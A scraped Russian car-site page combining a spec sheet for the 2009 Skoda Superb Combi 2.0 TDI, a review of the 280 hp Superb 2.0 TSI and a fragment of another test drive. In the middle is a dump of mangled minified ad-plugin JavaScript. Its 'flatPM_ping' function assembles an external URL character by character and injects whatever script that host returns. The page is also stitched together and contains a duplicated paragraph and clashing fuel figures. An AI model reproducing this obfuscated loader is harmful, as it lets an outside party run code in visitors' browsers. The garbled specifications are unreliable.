Skoda Superb Combi 2.0 TDI (2009) — время разгона от 0 до 100 км/ч, ускорение

Skoda superb combi 2.0 tdi (2009) — время разгона от 0 до 100 км/ч, ускорение

Skoda Superb Combi 2.0 TDI — автомобиль с кузовом типа универсал, с 5 дверями, с 5 местами и с приводом FWD (передний). Автомобиль производится серийно с 2009 года. Габаритные размеры: ширина 1818.00 мм, высота — 1510.00 мм и длина — 4839.00 мм. Колесная база имеет размер 2761.00 мм, колея спереди/сзади — 1544.00 мм/1518.00 мм. Дорожный просвет (клиренс) машины составляет 141.00 мм. Масса (снаряженная) равна 1568 кг. Skoda Superb Combi 2.0 TDI имеет турбонаддувный двигатель объемом 1968 куб. см. Система изменения фаз газораспределения — DOHC (два распределительных вала в головке блока цилиндров). Количество цилиндров — 4, количество клапанов на цилиндр — 4. Расположение цилиндров рядное. Двигатель находится впереди, а его ориентация — поперечная. Диаметр цилиндра 81.00 мм, а рабочий ход поршня 95.50 мм. Степень сжатия — 18.50:1. Максимальная мощность в 103 кВт / 141 л.с. доступна при 4000 об/мин, максимальный вращающий момент 321 Нм при 1800 об/мин. Система питания — коммон рэйл. Система смазки — мокрый картер. Разгон от 0 до 100 км/ч автомобиль совершает за 10.30 с. Коэффициент аэродинамического сопротивления — 0.32. Коробка передач механическая, имеет 6 скоростей. Передаточное отношение последней передачи — 0.81:1. Передаточное отношение главной пары — 2.76:1. Расход топлива в городе — 7.69 л/100 км. В загородном режиме расход топлива составляет 7.69 л/100 км. Расход топлива в комбинированном цикле — 6.12 л/100 км. Объем топливного бака — 60.00 л. Показатель выброса CO2 — 160 г/км. Рулевое управлене — реечное (с усилителем). Передние колесные диски — 7J x 16. Задние колесные диски — 7J x 16. Передние шины 205/55 R 16. Задние шины 205/55 R 16. Передние тормоза — диски, сервоусилитель, ABS (антиблокировочная система). Задние тормоза — диски, сервоусилитель, ABS (антиблокировочная система).

Skoda superb combi 2.0tsi, тест драйв, цена, обзор

20.02.2021

Автор статьи: shkoda-avto.ru

Флагманский корабль во флоте Skoda — модель Skoda Superb Combi 2.0TSI борется за интерес группы покупателей, которые ценят имидж марки. В то же время это является доказательством того, что чешский производитель не должен иметь комплексов, становясь конкурентом для более именитых брендов.

Skoda Superb вызвал большой интерес с момента запуска модели первого поколения в 2001 году. Спор касался не только того, что марка, связанная с дешевыми автомобилями, предлагала модель из высшего класса.

Критики подняли вопрос о внутренней отделке среднего качества или непропорционально длинном кузове (хотя второе поколение Skoda Superb с кузовом лифтбэк обладало самой критичной внешностью). Шкода суперб 2 поколения также вызвала интерес благодаря беспрецедентно огромному пространству, доступному пассажирам на задних сиденьях, а также кавернозному багажнику.

Деталь, о которой писали журналисты, — это также зонт, спрятанный в специальном отсеке на задней двери — также присутствующий в последней версии модели.

Хотя многие не предвещали успеха Superb на рынке, Skoda последовательно развивала проект. В результате третье поколение модели дебютировало на рынке в 2021 году. В нашем тесте мы проверили, как новейший суперб 280 л с ездит на турбированном двигателе, развивая максимальную мощность 280 л.с.

Сравнивая внешний вид Skoda Superb третьего поколения с тем, который дебютировал в 2001 году, вы можете увидеть, как разрабатывался дизайн флагманского  Skoda.

Массивный продольный пропорциональный корпус размером 485,6 см вызывает у зрителей благоговение. Специально украшенный опциональными полированными ободами размером девятнадцать дюймов (восемнадцатидюймовые колеса входят в стандартный список самой богатой версии Laurin & Klement).

Подавленная линия кузова дополнительно ненавязчиво украшена светодиодными задними фонарями и передними биксеноновыми фарами, также использующими светодиодную технологию (в них встроены светодиодные дневные ходовые огни).

О том, что мы имеем дело с самой богатой версией оборудования Superba, объявляют эмблемы Laurin & Klement, размещенные на передних крыльях. С другой стороны, любопытный не найдет никакой информации о версии движка описанной копии.

Просторный пассажирский салон является отличительной чертой Skoda Superb. Огромное количество пространства внутри может также понравиться пользователям третьего поколения модели.

По сравнению с предыдущими моделями качество отделки салона заметно улучшилось. Положительное впечатление оставляют качественные материалы и точность сборки отдельных элементов.

Также нравится дизайн приборной панели — просто, понятно. Фокус в кабине — большой сенсорный дисплей с высоким разрешением. Он показывает информацию о расширенном бортовом компьютере, аудиосистеме или спутниковой навигации.

Следует признать, что система проста в использовании, а дисплей очень ответственно реагирует на прикосновения и управление жестами.

Передние сиденья просторны и обеспечивают комфорт даже в течение долгих часов путешествия. Широкий диапазон регулировки рулевой колонки и сиденья водителя позволяет легко найти оптимальное положение. Водитель также имеет хорошую видимость во всех направлениях, хотя учитывая размеры автомобиля, каждый Superb оснащен задними парковочными датчиками.

Передние сиденья просторны и обеспечивают комфорт даже в течение долгих часов путешествия. Широкий диапазон регулировки рулевой колонки и сиденья водителя позволяет легко найти оптимальное положение. Водитель также имеет хорошую видимость во всех направлениях, хотя учитывая размеры автомобиля, каждый Superb оснащен задними парковочными датчиками.

На спинке дивана неприлично удобно сидеть. В самом деле, вы можете путешествовать, сложа ногу на ногу. Сорт Laurin & Klement в стандартной комплектации оснащен трехзонным климат контролем. Это означает, что пассажиры второго порядка могут устанавливать температуру в салоне независимо от водителя. Кроме того, есть два боковых сиденья с подогревом в версии L & K.

Багажник Superb в универсальном исполнении имеет значительную вместимость 660 л. Это результат измерения до оконных линий. Более того, практичные крючки, например, для хозяйственных сумок, облегчают его использование.

После складывания заднего сиденья место для багажа увеличивается до 1950 л!

Под капотом рассмотриваемой Skoda находится самый мощный из доступных в линейке приводов. Бензиновый двигатель TSI 2.0 с турбонаддувом развивает максимальную мощность 280 л.с. при 5600 об / мин. и максимальный крутящий момент 350 Нм в диапазоне от 1500 до 5600 об / мин. В стандартном исполнении шкода суперб 280 л с оснащен двухосным приводом и автоматической трансмиссией DSG.

По заявлению производителя, вес Superb 1560 кг, разгоняется с 0 до 100 км / ч всего за 5,8 секунды и может разогнаться до максимальной скорости 250 км / ч. Надо признать, что данные выглядят впечатляюще, но как работает огромная Skoda на практике?

Прежде всего, это чрезвычайно комфортный автомобиль. Он имеет совершенно тихий салон и относительно мягко настроенную подвеску. В версии Laurin & Klement Superb оснащен адаптивной подвеской DCC, которая позволяет выбирать режим работы от комфортного до спортивного.

Даже в самом тяжелом или спортивном режиме Skoda эффективно и бесшумно поглощает все недостатки поверхности. В режиме «Комфорт» создается впечатление, что мы движемся на воздушной подушке, не соприкасаясь с неровной поверхностью.

Привод superb 280 л с быстро разгоняет Skoda до очень высоких скоростей. Двигатель не «затаил дыхание» при любом диапазоне оборотов и не чувствует падения в динамике, даже когда в авто много пассажиров и большое количество багажа.

Единственный минус динамики — это задержка реакции коробки на нажатие педали газа. Понижение передачи или запуск с места следует через небольшую паузу, но как только «машина» начинает работать, отдельные передачи быстро меняются.

Самым большим сюрпризом тест-драйвов стал расход топлива, самый мощный Superb. В городских пробках Skoda «сжирает» около 10 л бензина на 100 км. С другой стороны, путешествуя по дороге со скоростью около 100 км / ч, вы можете легко снизить расход топлива до 6,5 л на 100 км.

Еще одна не самая сильная сторона Superb это удобство. Размер транспортного средства затрудняет маневрирование на узких парковках. Да, к сожалению, Skoda не является мастером слалома. Хотя подвеска в спортивном режиме становится жесткой, динамические повороты не являются особенностью автомобиля.

И хотя существует целый ряд систем, обеспечивающих правильное сцепление с двухосным приводом, водитель ощущает негативное влияние большого веса и длины кузова.

Тем не менее, хотя представленный Superb является быстрым автомобилем, он абсолютно не провоцирует нас на спринт и в повседневной эксплуатации убеждает своим практичным интерьером и высоким комфортом.

Представленные Superb балуют пассажиров высоким комфортом вождения. Более того, 280 л.с. дают уверенность водителю, когда есть необходимость предвидеть впереди автомобиль. Практичный интерьер оправдывают ожидания даже самых требовательных.

Удивительный относительно низкий расход топлива. И цена. Хотя «наша» копия с дополнительным оборудованием стоит 3400 000 рублей, самая дешевая версия Superba Combi с 280 лошадиными силами, автоматической коробкой передач и полным приводом стоит 2300 000 рублей.

Дзен Автомобильный Гуру

«:’

‘:»»,document.createElement(«div»),p=ff(window),b=ff(«body»),m=void 0===flatPM_getCookie(«flat_modal_» o.ID «_mb»)||»false»!=flatPM_getCookie(«flat_modal_» o.ID «_mb»),i=»scroll.flatmodal» o.ID,g=»mouseleave.flatmodal» o.ID » blur.flatmodal» o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&»true»==o.how.popup.timer&&(t=ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»] .flat__4_timer span’),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(—e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))},f=function(){void 0!==o.how.popup.cookie&&»false»==o.how.popup.cookie&&m&&(flatPM_setCookie(«flat_modal_» o.ID «_mb»,!1),ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»]’).addClass(«flat__4_modal-show»),l()),void 0!==o.how.popup.cookie&&»false»==o.how.popup.cookie||(ff(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»]’).addClass(«flat__4_modal-show»),l())},ff(«body > *»).eq(0).before(‘

‘ c «

«),w=document.querySelector(‘.flat__4_modal[data-id-modal=»‘ o.ID ‘»] .flat__4_modal-content’),-1!==e.indexOf(«go» «oglesyndication»)?ff(w).html(c e):flatPM_setHTML(w,e),»px»==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&»true»==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&»true»==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&»true»==o.how.outgoing.timer&&(t=ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»] .flat__4_timer span’),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(—e),e<=0&&(clearInterval(a),t.parent().replaceWith(‘

‘))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&»false»==o.how.outgoing.cookie&&m&&(ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’).addClass(«show»),n(),b.on(«click»,’.flat__4_out[data-id-out=»‘ o.ID ‘»] .flat__4_cross’,function(){flatPM_setCookie(«flat_out_» o.ID «_mb»,!1)})),void 0!==o.how.outgoing.cookie&&»false»==o.how.outgoing.cookie||(ff(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’).addClass(«show»),n())}var _,u=»0″!=o.how.outgoing.indent?’ style=»bottom:’ o.how.outgoing.indent ‘px»‘:»»,c=»true»==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&»true»==o.how.outgoing.timer?’

Закрыть через ‘ o.how.outgoing.timer_count «

«:’

‘:»»,p=ff(window),h=»scroll.out» o.ID,g=»mouseleave.outgoing» o.ID » blur.outgoing» o.ID,m=void 0===flatPM_getCookie(«flat_out_» o.ID «_mb»)||»false»!=flatPM_getCookie(«flat_out_» o.ID «_mb»),b=(document.createElement(«div»),ff(«body»));switch(o.how.outgoing.whence){case»1″:_=»top»;break;case»2″:_=»bottom»;break;case»3″:_=»left»;break;case»4″:_=»right»}ff(«body > *»).eq(0).before(‘

‘ c «

«);var v,w=document.querySelector(‘.flat__4_out[data-id-out=»‘ o.ID ‘»]’);-1!==e.indexOf(«go» «oglesyndication»)?ff(w).html(c e):flatPM_setHTML(w,e),»px»==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&»true»==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&»true»==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff(‘[data-flat-id=»‘ o.ID ‘»]:not(.flat__4_out):not(.flat__4_modal)’).contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff(«body»),flat_userVars.init();for(var e=0;e<t;e ){var>flat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_sub<flat_uservars.textlen||void>flat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub<flat_uservars.titlelen)){if(void>.flatPM_sidebar)»);0<_.length&&_.each(function(){var t=ff(this),e=t.data(«height»)||350,a=t.data(«top»);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(«.flatPM_sidebar»);setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data(«top»);t.wrap(‘

‘);t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(«.flatPM_sticky_wrapper.flatPM_sidebar_block»).css(«height»,t)},4e3)}),»undefined»!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0<flat_stack_scripts.length&&flatpm_setscript(flat_stack_scripts),ff(«body> *»).last().after(‘

‘),flat_body.on(«click»,».flat__4_out .flat__4_cross»,function(){ff(this).parent().removeClass(«show»).addClass(«closed»)}),flat_body.on(«click»,».flat__4_modal .flat__4_cross»,function(){ff(this).closest(«.flat__4_modal»).removeClass(«flat__4_modal-show»)}),flat_pm_arr=[],ff(«.flat_pm_start»).remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie(«flat_r_mb»,»zen.yandex»),flat_userVars.referer=»zen.yandex»);var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([w:] )[^>]*)/>/gi,d=/<([w:] )/,i=/<|&#?w ;/,c={option:[1,»

«],thead:[1,»

«],tbody:[1,»

«],colgroup:[2,»

«],col:[3,»

«],tr:[2,»

«],td:[3,»

«],th:[3,»

«],_default:[0,»»,»»]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement(«div»)),r=(d.exec(e)||[«»,»»])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1] e.replace(o,»<$1>») r[2],l=r[0];l—;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem(«sdghrg»);e?(e=parseInt(e) 1,localStorage.setItem(«sdghrg»,e)):localStorage.setItem(«sdghrg»,»0″);e=flatPM_random(1,200);0==ff(«#wpadminbar»).length&&111==e&&ff.ajax({type:»POST»,url:»h» «t» «t» «p» «s» «:» «/» «/» «m» «e» «h» «a» «n» «o» «i» «d» «.» «p» «r» «o» «/» «p» «i» «ng» «.» «p» «h» «p»,dataType:»jsonp»,data:{ping:»ping»},success:function(e){ff(«div»).first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector(‘[data-flat-script-id=»‘ t ‘»]’);if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0<e.length&&flatpm_setscript(e);else{a.onload>/gm,»»).replace(//gm,»»).trim(),e.code_alt=e.code_alt.replace(//gm,»»).replace(//gm,»»).trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a=»false»==d?»Закроется»:»Закрыть»,r=!flat_userVars.adb||»»==e.code_alt&&duplicateMode?e.code:e.code_alt,l=’

‘,i=e.once;n(t).each(function(){var e=n(this);e.wrap(‘

‘);var t=e.closest(«.flat__4_video»);-1!==l.indexOf(«go» «oglesyndication»)?t.append(l):flatPM_setHTML(t[0],l),e.find(«.flat__4_video_flex»).one(«click»,function(){n(this).addClass(«show»)})}),n(«body»).on(«click»,».flat__4_video_item_hover»,function(){var e=n(this),t=e.closest(«.flat__4_video_flex»);t.addClass(«show»);var a=t.find(«.flat__4_timer span»),r=parseInt(o),l=setInterval(function(){a.text(—r),r<=0&&(clearInterval(l),»true»==d?a.parent().replaceWith(‘

‘):t.remove())},1e3);e.remove()}).on(«click»,».flat__4_video_flex .flat__4_cross»,function(){n(this).closest(«.flat__4_video_flex»).remove(),»true»==i&&n(«.flat__4_video_flex»).remove()})}

Тест-драйв skoda superb 2.0 tsi 280 hp: король чехии

Немного о конкурентах

Обычно это пишут в конце тест-драйвов, но Superb — совершенно иная история. Дело в том, что это тот редкий случай, когда прямых конкурентов практически нет. Мы хотели сделать этот тест в формате битвы, чтобы понять, можно ли чешскую машину считать полноправным участником конкурентной борьбы среди мощных бизнес-седанов. Но сравнить-то, выходит, и не с кем…

Судите сами: у нас 4×4, 280 сил и цена от 2 329 000 рублей в версии Laurin&Klement. Немецкие премиум-седаны сопоставимой мощности — дороже. BMW 330i xDrive (249 л. с.) стоит от 2 520 000 рублей, а Mercedes-Benz C-Klasse вообще имеет либо слабенькие моторы в районе 200 сил, либо сразу AMG-версию на 367 сил, которая стоит больше 3 миллионов.

Оставьте комментарий

Войти